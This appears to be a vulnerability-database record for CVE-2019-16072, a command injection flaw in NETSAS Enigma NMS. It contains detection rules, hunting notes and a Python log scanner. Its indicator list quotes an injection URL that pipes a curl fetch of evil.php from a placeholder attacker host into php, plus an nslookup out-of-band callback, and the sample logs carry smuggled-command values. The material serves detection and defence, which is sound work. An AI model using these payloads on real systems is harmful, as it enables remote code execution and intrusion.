CVE-2019-16072
published 2020-03-20


Priority P185 · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Flags: ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 25.28% (97.7th percentile)
An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.

Affected

1 range
Vendor: netsas · Product: enigma_network_management_solution · Version range: <= 65.0.0 · Fixed in: (not listed)

Detection & IOCs (extracted from sources)

URL: /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20<attack_host>:<web_svr_port>/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1
Path: /cgi-bin/protected/discover_and_manage.cgi
Command: |nslookup+{{interactsh-url}}
Bytes: |7c| (pipe character) in the ip_address parameter of the /cgi-bin/protected/discover_and_manage.cgi URI
Snort/Suricata rule (ET, outbound):
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Outbound)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|7c|"; startswith; fast_pattern; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2019-16072; classtype:attempted-admin; sid:2029158; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2019_16072, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
Snort/Suricata rule (ET, inbound):
alert http $EXTERNAL_NET any -> any any (msg:"ET EXPLOIT Enigma Network Management Systems v65.0.0 CVE-2019-16072 (Inbound)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|7c|"; startswith; fast_pattern; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2019-16072; classtype:attempted-admin; sid:2029159; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2019_16072, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
  • The public PoC script uses HTTP GET, but the ET rules above trigger only on POST to the vulnerable CGI endpoint; monitor both GET and POST to /cgi-bin/protected/discover_and_manage.cgi with action=snmp_browser and a pipe character (|, hex 7c) in the ip_address parameter.
  • The exploit drops and serves a PHP reverse shell file named evil.php from a temporary HTTP server; detect outbound curl requests from the NMS host that fetch .php files from attacker-controlled infrastructure.
  • The Nuclei template confirms blind command injection with an OOB/OAST DNS callback (interactsh); treat unexpected DNS lookups originating from the NMS host as a sign of exploitation.
  • The exploit authenticates with HTTP Basic Auth before injecting; correlate successful Basic Auth logins to /cgi-bin/protected/main.cgi that are immediately followed by requests to discover_and_manage.cgi carrying shell metacharacters in ip_address.
  • The vulnerability is exploited in the wild by the Mirai variant EchoBot; correlate CVE-2019-16072 exploitation attempts with other EchoBot IoT exploit signatures.
  • The Nuclei template is marked 'verified: false', meaning its detection logic has not been confirmed against a live target and may produce false positives or false negatives.
  • Because the PoC uses GET while the ET rules are written for POST, deployments should make sure both HTTP methods are covered when writing detection rules for this CGI endpoint.
  • Exploitation requires valid credentials (HTTP Basic Auth); unauthenticated scanning will not trigger the vulnerability, so detections that rely solely on unauthenticated probes will miss authenticated attacker sessions.
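As an added example that is not part of this record or of any vendor tooling, the method-agnostic check described above, run over constructed access-log lines in Python: it matches the vulnerable path and action regardless of GET or POST, percent-decodes ip_address so an encoded %7C is caught, and flags any shell metacharacter. It inspects the URI query only (a POST body would need a different data source), and the log lines, hosts and oast.example are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
10.0.0.7 - admin [20/Mar/2020:10:01:02 +0000] "GET /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=192.0.2.10&snmp_ro_string=public HTTP/1.1" 200 512
10.0.0.7 - admin [20/Mar/2020:10:01:09 +0000] "GET /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=192.0.2.10%7Cnslookup+oast.example&snmp_ro_string=public HTTP/1.1" 200 512
10.0.0.7 - admin [20/Mar/2020:10:01:15 +0000] "POST /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&ip_address=192.0.2.10%3Bid HTTP/1.1" 200 77
10.0.0.9 - - [20/Mar/2020:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

VULN_PATH = "/cgi-bin/protected/discover_and_manage.cgi"
# Shell metacharacters that never belong in an IP address field.
METACHARS = re.compile(r"[|;&`$()<>\n]")
# Minimal combined-log-format parser: source, user, timestamp, method, request target.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)


def flag_request(target):
    """Return the decoded ip_address value if the request matches the
    CVE-2019-16072 pattern (vulnerable path, snmp_browser action,
    metacharacter in ip_address), otherwise None. Method-independent."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if params.get("action", [""])[0] != "snmp_browser":
        return None
    for value in params.get("ip_address", []):
        if METACHARS.search(value):
            return value
    return None


def scan_log(text):
    """Scan log lines; return (source, user, method, decoded ip_address) per hit."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        bad = flag_request(m["target"])
        if bad is not None:
            hits.append((m["src"], m["user"], m["method"], bad))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("ALERT CVE-2019-16072 pattern:", hit)
```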

CVSS provenance

NVD (v3.1): 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD (v2.0): 10.0 CRITICAL · AV:N/AC:L/Au:N/C:C/I:C/A:C
VulnCheck: 9.8 CRITICAL